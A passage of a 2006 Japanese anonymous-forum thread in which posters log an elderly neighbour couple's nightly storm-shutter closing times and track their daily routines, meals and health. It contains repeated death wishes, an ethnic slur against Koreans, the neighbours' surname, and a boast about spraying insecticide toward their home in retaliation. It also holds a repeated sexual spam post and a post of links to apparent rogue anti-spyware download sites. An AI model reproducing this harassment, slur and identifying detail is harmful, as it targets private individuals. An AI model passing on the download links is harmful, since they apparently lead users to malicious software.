137 :1:2006/05/31(水) 18:50:25 ID:pCWXPShQ
今日はババ17時に帰宅
ジジ車で18時30分頃帰宅
さて、何時にしまるかな?w
こちらはもう閉めた

138 :名無しさん@お腹いっぱい。:2006/05/31(水) 20:52:13 ID:RI2JsdLE
音観測日記
今、一階が閉まったw

139 :名無しさん@お腹いっぱい。:2006/06/01(木) 17:55:10 ID:DSbRCboL
先ほど両方帰ってきよった

140 :名無しさん@お腹いっぱい。:2006/06/02(金) 23:15:45 ID:IgDp5ljQ
今頃しめんなぼけ
氏ね

141 :1:2006/06/03(土) 19:58:36 ID:GYRjbi9d
今日は家の二階窓いまも全開
涼しいです
で、おとなりも家の真似をしてか半開きw

見えるからだろうね

家は見られてもいいよw

142 :1実況w:2006/06/03(土) 20:39:51 ID:uPCf+N7f
今しがた一階の台所付近が閉まりましたw

143 :1:2006/06/03(土) 21:36:11 ID:pj0YQRic
さぁ今日はどっちが早く閉めるかな?wwww

144 :名無しさん@お腹いっぱい。:2006/06/03(土) 23:07:16 ID:HhwrFn+i
隣2303

145 :名無しさん@お腹いっぱい。:2006/06/08(木) 23:28:54 ID:y2ZoS33L
今日は23:15に閉まった

146 :名無しさん@お腹いっぱい。:2006/06/11(日) 21:56:05 ID:W4+IM9uj
今、ガンガラガッシャ〜〜〜ンとお閉めになっておられますw
明日もお仕事のようです

147 :名無しさん@お腹いっぱい。:2006/06/13(火) 23:13:15 ID:w1LSLUdR
でたぁw 今閉めているw

148 :名無しさん@お腹いっぱい。:2006/06/24(土) 14:21:56 ID:+TD/WXpw
隣のばば キモ 韓国俳優の写真が・・・おいてあるw
窓全開w

149 :名無しさん@お腹いっぱい。:2006/06/30(金) 18:16:14 ID:EhrdRynn
昨晩は23時半に閉まったなw
今日はもっと遅いかなw
熱いよな

150 :名無しさん@お腹いっぱい。:2006/07/01(土) 22:35:51 ID:t9a07YHh
隣への報復で、風鈴をつけて一晩中鳴らしてみようかなwww

151 :名無しさん@お腹いっぱい。:2006/07/02(日) 00:15:17 ID:FN741PD8
隣は韓国好きのチョンと分かった
さて、風鈴爆弾をしてあげますwwww

152 :名無しさん@お腹いっぱい。:2006/07/02(日) 07:50:56 ID:pcVENIMk
本人に直接言えばいいのに


153 :名無しさん@お腹いっぱい。:2006/07/04(火) 22:20:26 ID:6s83zFsY
>>152
言いたいのですが、家の親が、「それは辞めておけと!わしの目が明るいうちは喧嘩するな!」
ということです

でも、一度ですが、こちらも思い言い切り閉めたことがありますが、関係なかったですwww

ついでですが窓からCSアンテナの窓用引き込み線の調子が悪くなったので、今は静かに閉めています
雨戸等が壊れるのは御免ですからね^^


このスレに書かれていたようにお隣のサインだと思って、今後資金が溜まれば二重窓にする予定

それにしても、変な60代もいるんですね 笑


一言「常識」

154 :名無しさん@お腹いっぱい。:2006/07/06(木) 23:31:12 ID:tGb/V8T3
隣の爺、今日は仕事休んで一日家にいたな
23時4分に、がんがらがっしゃ〜ん

アフォか?

寝る前に閉めるな

155 :名無しさん@お腹いっぱい。:2006/07/08(土) 21:55:42 ID:+gbEjq85
今、雨が降ってきたw 今日は糞暑いからまだ開けているなwww

156 :名無しさん@お腹いっぱい。:2006/07/08(土) 23:30:14 ID:wPVWOCwk
やはり23時10分 w

157 :名無しさん@お腹いっぱい。:2006/07/09(日) 23:28:07 ID:JjOjD+Ql
今晩は23時4分に閉まった

158 :名無しさん@お腹いっぱい。:2006/07/11(火) 22:48:58 ID:Y5IrOIsC
今日は今閉めているw
「ガラァ〜ン、ガシャ〜ン、シャ〜〜〜〜ァ(これはカーテンを閉める音w)
あれれ、サッシ窓と網戸の音がしないぞw

そうか暑いから雨戸だけで寝るようだw

エアコンも無いお隣さんww

159 :名無しさん@お腹いっぱい。:2006/07/13(木) 23:56:33 ID:552w9j9W
今晩は23時20分に閉めていたな
一階の台所でもあの大きな音が聞こえていたぞ

160 :名無しさん@お腹いっぱい。:2006/07/14(金) 16:39:56 ID:GjpDm7gZ
ヘェー 雨戸って、毎日しめるんだ。

当地には、雨戸がない。 大学時代は東京に行っていたが、東京の下宿には
雨戸があった。
[質問]  何故、当地の住居には、雨戸がないか。 勿論、経済的な理由じゃないが。


161 :名無しさん@お腹いっぱい。:2006/07/14(金) 23:53:23 ID:UcO7qMoY
今晩は23時19分閉まり

これは嫌がらせw

先日、お隣さんが大声で
「まだ、おきとるぞ〜〜〜」だとwwww

>>160そうなんです、お隣のプレ団塊さんは毎日1階2階、9箇所を深夜にお閉めに廻られ
ます もう笑えて

162 :名無しさん@お腹いっぱい。:2006/07/15(土) 07:37:11 ID:vdBV8UcO
隣の馬鹿ども、まだ寝ておるなw

163 :名無しさん@お腹いっぱい。:2006/07/18(火) 20:52:56 ID:vOGgFsV1
実況
只今、一階の南側が閉まりました

「ガンガラ、ガッシャ〜ン」閉まる所要時間 一箇所10秒の速度

戸を放るように!w

で、今一階台所が

で、今一階台所横(この部屋はないか知らない)

164 :名無しさん@お腹いっぱい。:2006/07/18(火) 20:54:11 ID:vOGgFsV1
何の部屋か?に訂正

165 :名無しさん@お腹いっぱい。:2006/07/20(木) 23:23:51 ID:5IEjljXY
昨晩は21時半、今晩は23時10分

166 :名無しさん@お腹いっぱい。:2006/07/23(日) 22:27:48 ID:y+DjGqDV
今晩は先ほど閉まった ガンガラガッシャ〜ン

167 :名無しさん@お腹いっぱい。:2006/07/23(日) 22:30:05 ID:y+DjGqDV
2階だけでも5箇所の雨戸w
大変だなw

168 :名無しさん@お腹いっぱい。:2006/07/28(金) 11:28:51 ID:ktqgXXNw
毎晩23時09分に閉めるようになったな

169 :名無しさん@お腹いっぱい。:2006/07/28(金) 11:59:46 ID:GqhOO3GG
こうやって隣組相互監視体制が完備しているから、日本の治安が良いのだな。

世の中の安寧秩序のためにも、雨戸の開け閉めをチェックしてね。

170 :名無しさん@お腹いっぱい。:2006/07/31(月) 21:18:27 ID:BS0p2CzB
今宵は今現在、お閉めになっておられるw

えらい早いw

171 :名無しさん@お腹いっぱい。:2006/08/02(水) 22:37:53 ID:XAiUKHOd
今日は早いw 今閉まった
昨晩は23時以降に閉まった

172 :1:2006/08/02(水) 22:40:29 ID:XAiUKHOd
>>169
お隣は閉め方が激しくうるさいだけ
普通はこんな遅くに閉めません

これは常識

173 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:02:33 ID:c0OmopZd
今宵は今閉めておる
ゴ〜ォ〜       網戸開け
ガラガラガッしゃ〜ん 雨戸閉め
カッチ 雨戸フック
ゴ〜ォ〜〜 網戸

サッシ窓は閉めていないw

174 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:15:22 ID:c0OmopZd
二階は今w
先ほどのは一階

175 :名無しさん@お腹いっぱい。:2006/08/05(土) 23:34:24 ID:l3PWghNN
今日も23時10分に閉まったw

明日は町内の大掃除、さぼられますwww

176 :名無しさん@お腹いっぱい。:2006/08/08(火) 00:00:11 ID:3lhzVl4j
今宵はお隣、まだ閉まってねぇwww

177 :名無しさん@お腹いっぱい。:2006/08/08(火) 13:25:41 ID:IA7vBjpk
昨晩は閉まらずw

暑い晩は開けておいたらよい

ということがやっと分かったみたい

178 :名無しさん@お腹いっぱい。:2006/08/08(火) 14:24:34 ID:Q1eRM0vf
台風だぞ。雨戸閉めんかい!


179 :名無しさん@お腹いっぱい。:2006/08/08(火) 19:29:50 ID:CUqW7Rmo
さすがに暑いようだw

180 :名無しさん@お腹いっぱい。:2006/08/08(火) 23:17:58 ID:oeVuw9Nv
うるさ〜ww

今日は今閉めているww

こちらも開けて確認

そのうちに怒鳴ってなるぞww

181 :名無しさん@お腹いっぱい。:2006/08/10(木) 23:05:00 ID:67HCIWv3
やかましい音 死ね

182 :名無しさん@お腹いっぱい。:2006/08/10(木) 23:29:08 ID:FPHpPzYs
今閉まったのは1階だけ
二階はまだ

これは明日は休みか

183 :名無しさん@お腹いっぱい。:2006/08/10(木) 23:32:24 ID:FPHpPzYs
今二階w
1、2個所閉まった

184 :名無しさん@お腹いっぱい。:2006/08/12(土) 23:21:40 ID:LfAn3p0v
今晩は、今必死で一階を閉めているなwwww

185 :名無しさん@お腹いっぱい。:2006/08/15(火) 23:07:51 ID:uHqvROSG
そろそろ二階が閉まるかな?www

がんがらがっしゃ〜ん

186 :名無しさん@お腹いっぱい。:2006/08/16(水) 20:32:54 ID:OEEsclmt
おっと今日は朝から雨戸が閉まっているw
これは帰ってこないな

やかましい音を聞かなくて済む 笑

187 :名無しさん@お腹いっぱい。:2006/08/18(金) 20:44:06 ID:sKBIEBFq
お隣、16,17,18日と居ない
旅行だ!静かwww


188 :名無しさん@お腹いっぱい。:2006/08/20(日) 21:08:29 ID:kqmiqP5n
今頃全雨戸が開いたぞ

189 :名無しさん@お腹いっぱい。:2006/08/20(日) 22:38:33 ID:QSofoRyb
物凄く面白いです。
ウオッチ日記(笑)
普通なら近所の騒音に迷惑がりいやなきぶんになるのに。
我がお気に入りスレに認定されました。
迷惑してるのに穏やかでいい>>1さんですね。

190 :1:2006/08/20(日) 23:03:32 ID:Za4SB/xF
>>189
阿呆らしくって(慣れたのかな?w)
金かけて窓を二重にする予定w

191 :名無しさん@お腹いっぱい。:2006/08/20(日) 23:13:18 ID:Za4SB/xF
今日も熱帯夜、閉まらないで寝ます^^

192 :名無しさん@お腹いっぱい。:2006/08/20(日) 23:13:49 ID:9FZfdpeI
他人の家の戸の閉まる時間を毎日確認してるなんて気色悪いと思う。
雨戸を閉める時間を考えてもらうなり提案すればいいのに。

193 :名無しさん@お腹いっぱい。:2006/08/20(日) 23:26:03 ID:hTsd2NSF
それは無理です
他人の生活習慣にとやかく言わないつもりです
まぁそのうちにお気づきになるでしょう

あっ歓談終わったw

194 :名無しさん@お腹いっぱい。:2006/08/21(月) 06:18:32 ID:LhWWsvM2
歓談終わったとかまじウケますw
普通なら迷惑がるとこを面白がる、
この考え方はどっかの迷惑騒音スレのかたにもみせてあげたいよ。
ウオッチがきみわるいとかじゃないっしょ。
迷惑騒音を笑いにもっていく、その考え方は参考になりました。
ありがとうございました。

195 :名無しさん@お腹いっぱい。:2006/08/21(月) 06:20:05 ID:LhWWsvM2
ご近所関係もあるからへたに提案とかできませんしね。

196 :名無しさん@お腹いっぱい。:2006/08/21(月) 19:28:01 ID:kZewr+li
昨晩はBSj小谷の歓談を見ていました
静かに音量を下げてね
お隣の雨戸閉めで音がかき消されるのはwww

197 :名無しさん@お腹いっぱい。:2006/08/21(月) 20:19:37 ID:ZfwgVRDK
あなたの生活にアンサーBOOKをつかってみてはどうかしら
ストレスの多い毎日、アンサーブックがあれば答えがでますわよ
http://heartland.geocities.jp/dk_yaya/index.htm
http://heartland.geocities.jp/dk_yaya/index.htm



198 :名無しさん@お腹いっぱい。:2006/08/21(月) 20:22:03 ID:LhWWsvM2
面白いですね。
お宅とお隣のお宅は仲がよろしいんですか?

199 :名無しさん@お腹いっぱい。:2006/08/22(火) 12:24:14 ID:AkMnHdp8
お互い、単に隣なだけ。w

200 :名無しさん@お腹いっぱい。:2006/08/23(水) 13:33:01 ID:sT1cTaGA
早朝6:36糞に開きますw

201 :名無しさん@お腹いっぱい。:2006/08/23(水) 13:57:10 ID:1+2BJfkx
家のご近所、午後11時くらいまで開けてるよ

202 :名無しさん@お腹いっぱい。:2006/08/23(水) 22:59:31 ID:ruRuC7cP
夏だからでしょうねw
こちは、年中23時前に閉まりますw

でも、最近一階だけで二階は閉まりませんw

暑いからでしょうね

203 :名無しさん@お腹いっぱい。:2006/08/24(木) 23:06:15 ID:xymOEiby
23:05まず一箇所
23:05次

204 :名無しさん@お腹いっぱい。:2006/08/25(金) 00:50:42 ID:V2akIcmD
閉まる箇所が減ったw

205 :名無しさん@お腹いっぱい。:2006/08/27(日) 00:15:37 ID:/1WC/5ID
今一階閉めてやがら
家の親はもう寝ているのに
うるさい

206 :名無しさん@お腹いっぱい。:2006/08/27(日) 00:16:24 ID:/1WC/5ID
次二階
アフォか

207 :名無しさん@お腹いっぱい。:2006/08/27(日) 00:17:14 ID:/1WC/5ID
うるさいな死ねぼけ

208 :名無しさん@お腹いっぱい。:2006/08/27(日) 22:26:58 ID:UA5DDTAD
さて今晩は何時に閉まるかなwww

209 :名無しさん@お腹いっぱい。:2006/08/27(日) 22:46:49 ID:UA5DDTAD
今全部閉まった模様w
こんな時間にすげぇ音
余所は誰もこんな時間に閉めていないぞw

210 :名無しさん@お腹いっぱい。:2006/08/28(月) 18:45:39 ID:7WieI3ba
今日は夕方隣の婆とでくわしたw
あの婆、夕方6時前に帰ってきて、近所の小さな子供いる主婦と雑談を30分以上w

これから支度して夕飯は20時以降

寝るのは23時以降


子供はいない

211 :名無しさん@お腹いっぱい。:2006/08/28(月) 18:47:42 ID:7WieI3ba
わが親曰く
一昨日は焼き魚の匂いが20時頃にしたから窓閉めた
昨日は肉
安い油とポツリと云ったのを記憶しているw

212 :名無しさん@お腹いっぱい。:2006/08/28(月) 18:57:22 ID:NNbKR9ks
隣の雨戸ガンガラ亭主
今帰ってきた
今日は遅い
いつも通年18時には帰っている
寄り道してきたようだw

あと1年か2年の命か仕事生命

213 :名無しさん@お腹いっぱい。:2006/08/28(月) 20:07:23 ID:r8p5aDDZ
今宵もお隣焼肉w
臭かったw
TBS系列みて喜んでおられましたw

214 :名無しさん@お腹いっぱい。:2006/08/28(月) 20:15:12 ID:ORZ0Tc6K
あぁ〜〜〜臭かったw

215 :名無しさん@お腹いっぱい。:2006/08/28(月) 22:00:37 ID:2+LCbmBu
さぁ今日は汝かなw

216 :名無しさん@お腹いっぱい。:2006/08/28(月) 22:05:11 ID:2+LCbmBu
今一階の一箇所だけ閉まりました
夏はどこも窓を開けているので、生活状況が把握できます
笑えます

先月などはお茶碗を落とされました(午後10時頃) ワロタ

217 :名無しさん@お腹いっぱい。:2006/08/28(月) 22:52:35 ID:FMn0V8kZ
今日は隣が閉めるのを待ち構えて、言いそうだ
「うるさいぼけ、死ね」と!

218 :名無しさん@お腹いっぱい。:2006/08/28(月) 23:19:00 ID:o7D8sbGa
今宵は23時5分に婆が閉めていたのを確認した
仁王だちw

今一階の玄関閉まったw

219 :名無しさん@お腹いっぱい。:2006/08/29(火) 19:50:49 ID:NWU8FySa
昨晩はとうとうぶち切れて「ガンガラ、うっさいなぁ」と大声で言いましたw
夜23時6分の出来事w

220 :名無しさん@お腹いっぱい。:2006/08/29(火) 22:35:10 ID:2JUw7Q91
効果無しだとは思いましたけどw

221 :名無しさん@お腹いっぱい。:2006/08/29(火) 22:51:22 ID:RbeQoSqe
一階が完了w
家の親は一階で寝ている

で、そろそろ階段を上がられて(憶測)二階へw

あっ、筋向いのDQNのボロチェロ車が帰ってきたw
やかましいアメ車

222 :名無しさん@お腹いっぱい。:2006/08/29(火) 23:23:45 ID:v7JsqCje
今2階の北側
つぎ南w
つぎ3枚雨戸の西かな?w

223 :名無しさん@お腹いっぱい。:2006/08/29(火) 23:45:33 ID:gngw3SXF
ウヒョ閉まらないw

224 :名無しさん@お腹いっぱい。:2006/08/30(水) 20:52:23 ID:8Oq/WS52
ぶち切れて文句を言ったのが効いたようです
6年越しの快挙ですwwwwwwwwwwwwwwwww

ワロタ

225 :名無しさん@お腹いっぱい。:2006/08/30(水) 22:04:40 ID:Ctbgg7u9
さて、閉まるかな?w

226 :名無しさん@お腹いっぱい。:2006/08/30(水) 23:05:20 ID:tNxV4/lg
今1階2階同時にやっているな
時間を考えろw


馬鹿め

227 :名無しさん@お腹いっぱい。:2006/08/31(木) 04:27:43 ID:A5015UoO
いつもうるさいから、たまに隣寄りにクッサイ殺虫液を撒いてやってます。
あと、蚊取り線香を焚いてやったりねw

専業主婦なのに、前住んでいたところで神経から胃を半分取っ手るってんだから機知害だよ。
箱入り娘ももうしわがれたババアだなw
はよ、死ね! マジで。

228 :名無しさん@お腹いっぱい。:2006/08/31(木) 04:28:47 ID:A5015UoO
苗字は竹内な。 名前は知らんが、騒子ってとこか? www

229 :名無しさん@お腹いっぱい。:2006/08/31(木) 20:46:15 ID:u/Er+oiZ
プレ団塊は常識が無いなw

230 :名無しさん@お腹いっぱい。:2006/08/31(木) 21:14:28 ID:gvqkTlmt
なんか今もの凄い音がしたぞw
もう閉めたのか?www

231 :名無しさん@お腹いっぱい。:2006/08/31(木) 22:57:58 ID:oXW1apwE
音だけで判断w
まず多分一階台所 22:57

232 :名無しさん@お腹いっぱい。:2006/08/31(木) 23:02:10 ID:oXW1apwE
23:01一階台所横

233 :名無しさん@お腹いっぱい。:2006/08/31(木) 23:03:39 ID:oXW1apwE
ん?今2箇所一度に閉まったような音w
二階か?

234 :名無しさん@お腹いっぱい。:2006/08/31(木) 23:13:08 ID:oXW1apwE
あれ?もうガンガラガッシャ〜ン オワリか???w

235 :名無しさん@お腹いっぱい。:2006/09/01(金) 00:27:56 ID:/6sLiJ3O
今頃二階を閉めやがった

これは嫌がらせだな

236 :名無しさん@お腹いっぱい。:2006/09/01(金) 00:30:38 ID:/6sLiJ3O
先日文句を言ってやったのに反応しやがったwwww
我がま隣の雨戸だけ残しやがったw

阿呆なプレ団塊 死ね

237 :名無しさん@お腹いっぱい。:2006/09/01(金) 00:32:00 ID:/6sLiJ3O
また怒鳴ってやるw

238 :名無しさん@お腹いっぱい。:2006/09/01(金) 00:35:15 ID:UPB/fO5v
0時33分に寝て、6時30分に起きて
7時37分に車で出かけ
夕方5時51分帰宅の 爺

239 :名無しさん@お腹いっぱい。:2006/09/01(金) 18:12:34 ID:9LdqqZjC
今日はお隣、18:05分にご夫婦揃ってご帰宅w
早速二階の北がわの窓だけ開きました
我が家は東西南北全部屋を開けていますが

また、昨晩のように嫌がらせをされるでしょうw

明日は休みだから遅くまで起きるから、閉めるのも遅いの

という理由

日曜の実態報告は後日!

イレギュラーで休日書き込みもするかもwww

240 :名無しさん@お腹いっぱい。:2006/09/01(金) 18:13:16 ID:9LdqqZjC
ついでに62歳男と50代後半婆は暇なんだな

241 :名無しさん@お腹いっぱい。:2006/09/01(金) 18:36:06 ID:7nW2a5+k
多分ねw

242 :名無しさん@お腹いっぱい。:2006/09/01(金) 19:52:47 ID:lqEY+KIG
家の親から言われました
少しは我慢しておいてやれ!と

243 :名無しさん@お腹いっぱい。:2006/09/01(金) 21:33:14 ID:JoOQ3R3v
今宵は今21時29分、ご夫婦で車で出かけました
今晩は静かもw

玄関を一度閉めもう一度開けて玄関内電灯の消し忘れ?www

でもう一度閉めてお出かけw

そういえば昨日23時頃大きな声で、婆が「私もいく」とさ

このことなんだなw

もう聞こえすぎwwww


で、二階の雨戸は閉まっていないし寝られるなプップ

244 :名無しさん@お腹いっぱい。:2006/09/01(金) 22:56:54 ID:5fgNMTJB
あれ?閉まらないよw
ってどこかでお隣さんこのスレをチェックしているの?wwwwwWw

245 :名無しさん@お腹いっぱい。:2006/09/01(金) 23:32:43 ID:VnyyP+k9
何処かへ遊びにいきよったw
静かだ
おやすみなさい

246 :名無しさん@お腹いっぱい。:2006/09/02(土) 11:03:42 ID:7ImdBU5l
と思ったら0時過ぎに帰ってきよった 笑
そうしていつもに増して嫌がらせがはじまったw

247 :名無しさん@お腹いっぱい。:2006/09/03(日) 02:48:47 ID:wZazMqrg
0時以降に閉め始めたので、「うるさい」「やかましい」「非常識だ」と怒鳴ったら
今晩は23時前に閉まったwwwwwwww

248 :名無しさん@お腹いっぱい。:2006/09/03(日) 18:57:17 ID:WBjVKsk6
今お隣さんの爺はアマチュア無線(不法にブースターでパワーうp)
今日はパチョコンで遊んでいるの?
10日で分かるホームページの本を買ったんだよねw

置いてあったぞwww

249 :名無しさん@お腹いっぱい。:2006/09/03(日) 18:58:21 ID:WBjVKsk6
講習の電話級って頭悪いよwww

250 :名無しさん@お腹いっぱい。:2006/09/03(日) 20:22:28 ID:SYGwtZtP
今日は汝ですか?w
明日も仕事?
62歳だから年金もらえるまでの繋がり、もうすこしですねwww

251 :名無しさん@お腹いっぱい。:2006/09/03(日) 20:56:47 ID:SYGwtZtP
明日は何時ですか?ww
コノスレ見ていないでしょうねw

252 :名無しさん@お腹いっぱい。:2006/09/03(日) 21:48:03 ID:Gn+hDSLZ
あれれ?今日は一階のないやら雨戸を動かす音が今したのだ
これは家とは反対側
さては、また嫌がらせw


もう老人は困るなwww

253 :名無しさん@お腹いっぱい。:2006/09/03(日) 22:43:30 ID:KVXwoeuH
まだ一階で咳払い
二階は開けた窓から夜風で稲刈り後の燃やした灰の臭いでいっぱいだけどw
両肺無いだったよねwwww

254 :名無しさん@お腹いっぱい。:2006/09/03(日) 22:45:30 ID:KVXwoeuH
そんな嫌がらせのような閉め方をしないでさぁ

貴方の周りを見渡せば?

いまの時間に閉めているご家庭がありますか?wwww 笑


無いでしょ

255 :名無しさん@お腹いっぱい。:2006/09/03(日) 22:49:28 ID:KVXwoeuH
網戸にしていた玄関が閉まった
えらい早いじゃぁないか?w

いつも0時以降

256 :名無しさん@お腹いっぱい。:2006/09/05(火) 23:21:52 ID:1wm+dFun
こちらは寝る部屋を変えましたw
すこし静か

257 :名無しさん@お腹いっぱい。:2006/09/05(火) 23:43:58 ID:u/ZSYTy9
あれ?サッシ窓の音がww
スレ見ているのかな?

258 :名無しさん@お腹いっぱい。:2006/09/07(木) 00:01:52 ID:JuMBjZCk
今度は大きな音でテレビかw
どちらも雨戸を閉めても聴こえてくる

これは、サッシ窓閉めておらんな

何時までつけているかだw

耳悪いのだろうか

259 :名無しさん@お腹いっぱい。:2006/09/07(木) 22:26:01 ID:8+iNEaPe
雨が降っているのに開けっ放しw

ん?閉まったかな?w

260 :名無しさん@お腹いっぱい。:2006/09/10(日) 20:00:00 ID:R4WHQ4AX
今度はスカパー機器を買い換えたようだw
登録番号丸聞こえw

261 :名無しさん@お腹いっぱい。:2006/09/10(日) 20:22:03 ID:E0/tsXEV
63歳の HAR○時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ




262 :名無しさん@お腹いっぱい。:2006/09/10(日) 20:51:50 ID:ZIecQVmA
今一階台所w

263 :名無しさん@お腹いっぱい。:2006/09/10(日) 20:52:51 ID:ZIecQVmA
次台所横の部屋
多分仏壇のあるところ(夏に孫が来ていて、鐘で遊んでいた音が聞こえたw)

264 :名無しさん@お腹いっぱい。:2006/09/10(日) 23:32:51 ID:GO3iwPcV
さぁて二階に上がってきよったなw
何時に閉まるかな
しかし、このプレ団塊があと数年で完全退職したら、もっと遅くなりそうな予感

仕事がないと遅くまで起きているだろうな

それにしても、2時前までテレビみてよくまぁ
あくる日仕事中眠たくないものだ
よほど暇な仕事となのだろうなwww

265 :名無しさん@お腹いっぱい。:2006/09/10(日) 23:34:04 ID:GO3iwPcV
今一階で爺が風呂に入っておるわいw咳払いが聴こえた
二階にいるのは婆だな

266 :名無しさん@お腹いっぱい。:2006/09/10(日) 23:49:41 ID:UmCrb8wB
23:48突然閉めやがった うるさー これは嫌がらせだな

267 :名無しさん@お腹いっぱい。:2006/09/10(日) 23:54:27 ID:y2UngcNG
今度また文句を言ってやるww

268 :名無しさん@お腹いっぱい。:2006/09/12(火) 11:42:43 ID:ydHS3f+Q
昨晩は、また2時までテレビを見てやがった

269 :名無しさん@お腹いっぱい。:2006/09/12(火) 14:03:13 ID:Ou922foS
あれ?隣、今日は家におるw

270 :名無しさん@お腹いっぱい。:2006/09/13(水) 20:32:25 ID:Glmg+ETz
こんなに強く雨が降っていてもまだ閉めない隣w

271 :名無しさん@お腹いっぱい。:2006/09/14(木) 20:17:33 ID:2/6YIWUQ
一昨晩および昨晩は午前3時頃までTVを大音響で鳴らしていた
子守唄?wwww

272 :名無しさん@お腹いっぱい。:2006/09/14(木) 23:01:20 ID:4wKkqKJ0
今宵は今、ガンガラやってますwwww

273 :名無しさん@お腹いっぱい。:2006/09/15(金) 23:53:56 ID:yYRxfpqC
阿呆ども0時前には閉めるようになったなwww

274 :名無しさん@お腹いっぱい。:2006/09/16(土) 00:33:12 ID:SAQiszgG
休日前は遅いw

275 :名無しさん@お腹いっぱい。:2006/09/16(土) 17:49:38 ID:O4ZExtqU
お年寄りの非常識人に何を言っても無駄

276 :名無しさん@お腹いっぱい。:2006/09/18(月) 22:52:51 ID:xs9fyLJr
今日も豪快だw 凄い音
よそさんは、今頃閉めていない 馬鹿だ

277 :名無しさん@お腹いっぱい。:2006/09/20(水) 22:07:00 ID:JBrb6VMm
あれ?もう閉まったw

278 :名無しさん@お腹いっぱい。:2006/09/21(木) 18:14:47 ID:kKRqf+JG
家はもう閉めた
隣は今帰ってしかも、網戸にしていた
暑がりか?
25度を下回っている

279 :名無しさん@お腹いっぱい。:2006/09/23(土) 23:59:47 ID:yL2/hk03
昨晩はまた0時だったな

もうせっかく寝たのにおこされてしまった

がんがらがっしゃ〜〜ん

苦情を言っても無駄だった
死ね

280 :名無しさん@お腹いっぱい。:2006/09/27(水) 20:23:44 ID:Kd8qXhBm
おや?笑
20:22に閉まりました あれれれ????
wwwww

281 :名無しさん@お腹いっぱい。:2006/09/30(土) 14:22:22 ID:bpn54Hhv
昨晩はまた、23時前

282 :名無しさん@お腹いっぱい。:2006/09/30(土) 22:39:28 ID:6qSbCf4G
今日はまだ閉まらず
これは苦情を言っても効果無しの爺婆家庭だ DQN

283 :名無しさん@お腹いっぱい。:2006/09/30(土) 23:18:33 ID:e0N+SS7/
23:10に閉まった
こちらが、閉めるのを促してやった

こちらも、雨戸を開け閉めして音でわかったのだろうな
こちらは、すでに夕方に一旦閉めた

284 :名無しさん@お腹いっぱい。:2006/10/01(日) 18:49:32 ID:cdthQldf
今宵は18時頃に全室閉まりましたw ワロタ

285 :名無しさん@お腹いっぱい。:2006/10/01(日) 18:52:02 ID:cdthQldf
まだ残っていたようで、ガンガラいわせているwww

286 :名無しさん@お腹いっぱい。:2006/10/05(木) 00:26:58 ID:COWX+95e
今宵は23:10

287 :名無しさん@お腹いっぱい。:2006/10/05(木) 02:42:33 ID:sny94QW0
今日は深夜3時までの、、テレビをつけていないなw
深夜に大きな音で、迷惑だ
まぁ嫌がらせだと思うがw

288 :名無しさん@お腹いっぱい。:2006/10/06(金) 00:39:21 ID:eEII1viR
22:59閉まり

289 :名無しさん@お腹いっぱい。:2006/10/07(土) 22:32:38 ID:eM+K3QQT
22時一階の台所付近が閉まる音w
今、南側の部屋かな?

隣の行動丸分かり

二階はまだか?休日は遅い隣

暑さ寒さ関係なく遅い雨戸の閉まり方

こいつら頭おかしいのだろうか?
日中の日を入れたらさっさと閉めるのが常識

290 :名無しさん@お腹いっぱい。:2006/10/07(土) 22:45:14 ID:eM+K3QQT
只今、2階閉まり(2階でご就寝のお隣w)

291 :名無しさん@お腹いっぱい。:2006/10/08(日) 12:13:45 ID:wMcdn4w7
63歳の H○RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ

K亀公園でテニス 昼間やってます
よろしかったら誘ってください


292 :名無しさん@お腹いっぱい。:2006/10/08(日) 21:09:28 ID:IoVWuQS5
明日も休みなのに、今一生懸命全雨戸をお閉めになっておられるwww

毎日早く閉めろやwww

293 :名無しさん@お腹いっぱい。:2006/10/10(火) 10:39:45 ID:CnDUj2iB
http://spyheal.com/download.php?sid=qh2sl1hd124gjid0bgl9hpjp07
http://www.pesttrap.com/install.php
http://thespyguard.com/get.php?aff=103
http://www.bravesentry.com/download.php?advid=177
http://malwarewipe.com/download.php?sid=tq30vohgrf7210qvcaeq5nu3m7

294 :名無しさん@お腹いっぱい。:2006/10/10(火) 22:32:33 ID:KlnIJPwM
只今、一階閉まり

295 :名無しさん@お腹いっぱい。:2006/10/14(土) 22:13:40 ID:qAQPfGz0
今日は何時かな?wwww

296 :名無しさん@お腹いっぱい。:2006/10/18(水) 13:45:28 ID:2cS5/aUZ
ここ数日しまる時間が22時前になりました
すこし安心^^

297 :名無しさん@お腹いっぱい。:2006/10/19(木) 18:13:56 ID:CPqBeK2A
18時帰ってきた隣の爺
くしゃみしているよ
はやく雨戸閉めたら?wwww

寒いでしょ?0時まで開けてなにが楽しいの?

298 :名無しさん@お腹いっぱい。:2006/10/22(日) 23:28:11 ID:HxBBGAiY
今宵は22:53閉まり

299 :名無しさん@お腹いっぱい。:2006/10/24(火) 23:46:56 ID:4jEViwqn
23:00

300 :名無しさん@お腹いっぱい。:2006/10/26(木) 00:17:26 ID:mkAduO5y
2階 22:20 1階 0:16

301 :名無しさん@お腹いっぱい。:2006/10/26(木) 18:16:46 ID:WWpnaLae
お隣の60代は軽度の認知症かもねw
でも、車運転しているけど
近寄りがたいw

302 :名無しさん@お腹いっぱい。:2006/10/26(木) 19:09:34 ID:gtvgs2sA
今宵は豪快に一階が閉まりますたwww

さて、二階は?プップ

303 :名無しさん@お腹いっぱい。:2006/10/28(土) 00:33:58 ID:7a01SeqP
21:20閉まり

304 :名無しさん@お腹いっぱい。:2006/10/28(土) 08:54:30 ID:EvQ4F4nm
今開いたなw
いつまで寝ているのだwww グータラ団塊www

305 :名無しさん@お腹いっぱい。:2006/10/29(日) 21:01:36 ID:MtC+Szbg
>>291
あんた精力ありすぎだよ(藁)

